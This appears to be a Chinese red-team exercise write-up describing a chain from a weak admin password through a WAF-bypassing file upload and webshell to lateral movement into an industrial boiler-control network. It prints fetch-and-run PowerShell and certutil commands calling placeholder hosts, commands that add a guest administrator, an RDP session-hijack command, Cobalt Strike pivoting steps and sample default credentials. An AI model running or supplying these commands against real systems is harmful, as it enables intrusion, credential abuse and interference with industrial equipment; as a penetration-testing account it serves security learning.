从弱口令到内网生产区

从弱口令到内网生产区
2023-5-1 00:4:30 Author: 白帽子(查看原文) 阅读量:28 收藏

前段时间参加了一次攻防演练，其中遇到了不少有意思的问题，最后也是进到了内网生产区，大体把过程写一下。

前期信息收集

首先给定的目标是包括公司官网之类的互联网资产，刚开始做信息收集的时候在各种互联网资产探测引擎上查找目标信息，尝试了各种SQL注入以及反序列化等可以简单getshell的方式，然而并没有什么用。另外资产探测引擎一般会在每天的0点更新一次前一天发现的资产，所以0点过后对白天搜索过的目标再检索一次可能会有意想不到的收获。对web资产直接访问会经常访问不到具体的系统，而是一些默认的中间件配置页面，有些目标可能因为有防护设备的原因，拿爆破目录的工具一扫就被封IP，这很头疼。。。

某平台弱口令

在探测引擎资产测试无果后，决定试一下用Nmap扫全端口，因为正常情况下fofa等工具很难对某个IP做到百分之百的资产探测而且存在一定的延时性。在扫描某个IP的全端口之后，找到了一个之前没有发现的系统，而且存在弱口令。
admin 123456

通过脏字符绕waf，文件上传获取webshell

进入系统后，翻了一遍各功能发现虽然是超级管理员权限，但是系统中并没有包含员工的敏感信息(众所周知，身份证号等的敏感信息泄露可以用来刷分)或者是其他的有用数据，所以尝试一下对其中的搜索、上传等功能进行利用看能不能getshell。

系统的安全检验禁用了直接上传jsp的方式，且大部分常见的上传绕过方式都是不可用的

根据返回结果判断存在waf，拦截了文件名和内容

尝试了几处的文件上传都无法成功，要么就是可以上传，但并不返回地址也不解析，白给了属于是

最后在一个“通知发放”的功能中找到了一处可用的文件上传漏洞，不过其中也是费尽一些周折。

经过多次尝试后发现，在POST数据包中给文件名添加超长的脏字符数据可以绕过文件名的安全检验，另外配合免杀的jsp马直接获取一个administrator权限的webshell(当然这种方式也比较常见而且有失败的可能，但是每种方法多试几次，成功的概率总会比较大一些)。Burp上传的数据包过长导致无法截全图，但是基本思路是如下这样(图片来自互联网，侵删)，即在filename后的文件名字段添加不停地添加数据，这样WAF可能为因为性能原因作出让步，超出检查长度的内容，将不会被检查。

成功获取webshell

探测一下受害主机相关信息，发现目标主机出网，但是存在杀软

powershell绕过杀软.上线cs

既然现在我们有了一个webshell，那么接下来的利用思路可以选择证书下载或者powershell等方式上线cs。
可以尝试使用证书下载尝试下载木马到服务器执行:

 certutil.exe -urlcache -split -f http://x.x.x.x/x.exe D:\x.exe

很明显，在安全设备的拦截下，这种基础的证书下载也是白给

尝试执行powershell命令直接上线cs

powershell.exe IEX ((new-object                     net.webclient).downloadstring('http://x.x.x.x/x'))

先拿powershell试试，利用其实现与远端IP进行通信，利用其传递木马执行实现肉鸡上线。其最主要优点就是无文件落地，痕迹只存在于内存进程之中，隐蔽性较强。不过正常来说这种通过公网IP地址下载并执行木马脚本，肯定会被杀毒软件WAF等设备拦截，我们可以通过对PowerShell语句进行改进、变换、拼接等操作，实现免杀。

echo I^E^X ((new-object net.webclient).d^o^w^n^l^o^a^d^s^t^r^i^n^g('http://0.0.0.0)) | p^o^w^e^r^s^h^e^l^l -

读密码，搭建socks代理，进入内网

主机上线CS后对本机进行信息收集，发现目标为server2012服务器，无法读取明文密码，因此选择激活guest用户

激活guest用户

net user guest /active:yesnet user guest [email protected]net localgroup administrators guest /add

搭建socks5隧道登录guest用户，使用rdp劫持登录administrator。

query usersc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1为目标会 话id和当前会话名net start tide

探测内网资产

成功登录后通过在本机进行信息收集，发现远程连接的凭证信息，其它服务数据库密码等等信息

继续对内网资产进行探测，发现一些MS17010以及数十台数据库弱口令、还有一些内网web 弱口令等较多资产，这里就不一一列举了

192.168.x.x mssql:sa/sa123

mssql:192.168.x.x:1433:sa sa123

在内网不断收集信息横向移动

突破到内网生产区专网

原本以为作为一个常规内网，刷几台数据库+内网web弱口令+几台SSH后就在此结束，但是在内网资产收集过程中，通过数据库命令执行发现某台机器存在多网卡191和192段

该网段不通互联网且不通业务内网

通过查看进程，发现进程中存在MODBUS协议软件进程，猜测为工控主机。

因为无法连接191该段，尝试了多种方法，最终通过通过cs正向木马上线，以当前被控机作为跳板机正向连接此191网段多网卡机器
首先生成监听器beacon-tcp，监听在17775端口

然后CS生成一个stageless木马，选定刚才的新建监听器

最后运行生成的木马，并在 beacon中执行connect x.x.x.x 17775即可建立子beacon上线CS。

上线cs后，尝试搭建二层socks代理进入生产专网。获取主机密码后，登录rdp，发现本机存在锅炉监控系统(图文无关)

再对这台主机的内网资产进行探测，发现http://191.0.x.x user/123456 该设备为锅炉监控控制器，处理并转发现场锅炉设备的数据(图文无关)

然后通过某工控机-4 Administrator 空密码(图文无关)

工控机1-Administrator 空密码(图文无关)

还有几台类似机器，就不把图放上了，总的成果来说是这些

总结

1、信息收集真的很重要，哪怕是一个小小的弱口令最后都可能造成严重的后果。

2、不要觉得扫全端口很麻烦，这招简直屡试不爽，我经常在某个目标C段中每10个IP为一组去挨个扫全端口，总能有一些新收获。

3、免杀和绕过需要不断地积累学习，红队在进步，蓝队(设备)也在进步。

文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246669&idx=2&sn=b58a887c632cd5c1a298af43e2fe93c3&chksm=82ea55a4b59ddcb2ec42f10e4c999bd161aadf2d7289e5a2a8786dc86af719101f2b26b44338#rd
如有侵权请联系:admin#unsafe.sh